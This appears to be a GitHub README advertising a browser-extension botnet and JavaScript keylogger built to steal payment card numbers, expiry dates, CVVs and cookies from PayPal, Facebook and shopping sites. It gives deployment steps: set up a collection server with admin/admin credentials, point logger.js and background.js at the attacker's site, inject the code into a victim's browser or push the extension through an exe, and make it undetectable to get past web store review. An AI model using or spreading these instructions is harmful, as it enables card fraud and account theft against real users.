
botnet browser chrome,mozilla firefox,capture card number any web site ,paypal,facebook,e-commerce ,get card number,expiration date, CVV , best keylogger javascript

Primary LanguageJavaScript


botnet browser chrome,mozilla firefox,capture card number any web site ,paypal,facebook,e-commerce ,get card number,expiration date, CVV

Name Value
Version 4 (Free )
Language Javascript, PHP
Keylogger Chrome,Firefox
Cookies Firefox

Screenshot (older panel )




Screenshot (2020 )

téléchargement (1)

open log without redirect , remove log very simple


Name Value
Version Pro
Baypass Chrome and Firefox
exe file to download and install extension


Demo Video Facebook : Pro Version

Chrome + https://www.facebook.com/102313318301415/videos/2889519731295268

Demo video Facebook :

Chrome + https://web.facebook.com/102313318301415/videos/651706715777891/

Firefox + https://web.facebook.com/102313318301415/videos/348004879720079/

Configuration : Server

Start your wampserver,xamp ....etc and send the "server" folder to your server

  • server
  1. config.php

usernam = admin

password = admin

Configuration : extension

inject javascript code into web browser of victime or use extension chrome or mozilla firefox

Open the extension folder js/

  • logger.js put the name of your website for exemple ` and save changes

  • background.js change "url" redirect after install extension and "url" of cookies

Exe file to download and Load chrome extension

this exe file can download and load chrome extension without active mode developper for chrome ,see the demo 1

Installation Manually Chrome / Firefox :

  • Chrome
  1. Open Chrome browser and navigate to chrome://extensions
  2. Select "Developer Mode" and then click "Load unpacked extension...
  3. load folder extension
  • Mozilla Firefox
  1. Open Firefox browser and navigate to about:debugging
  2. Click "Load Temporary Add-on"
  3. click manifest.json

to upload extension in mozilla firefox or chrome web store you need a new version fud or some technique .



Instagram : @hakanonymos